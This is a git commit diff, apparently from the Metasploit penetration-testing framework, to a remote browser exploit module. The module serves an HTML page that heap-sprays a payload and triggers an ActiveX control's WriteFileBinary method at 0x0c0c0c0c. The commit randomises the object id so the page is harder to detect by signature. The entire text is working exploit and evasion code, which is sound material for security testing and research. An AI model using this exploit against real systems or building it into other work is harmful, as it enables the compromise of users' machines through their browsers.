Randomize object id

bug/bundler_fix
jvazquez-r7 2013-08-27 10:35:06 -05:00
parent 66fa1b41aa
commit f59f57e148
1 changed files with 3 additions and 2 deletions

View File

@ -215,6 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
def load_exploit_html(my_target, cli)
p = get_payload(my_target, cli)
js = ie_heap_spray(my_target, p)
object_id = rand_text_alpha(rand(10) + 8)
html = %Q|
<html>
@ -224,9 +225,9 @@ class Metasploit3 < Msf::Exploit::Remote
</script>
</head>
<body>
<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='poc'></object>
<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>
<script language='javascript'>
poc.WriteFileBinary("#{rand_text_alpha(4+ rand(4))}", 0x0c0c0c0c);
#{object_id}.WriteFileBinary("#{rand_text_alpha(4+ rand(4))}", 0x0c0c0c0c);
</script>
</body>
</html>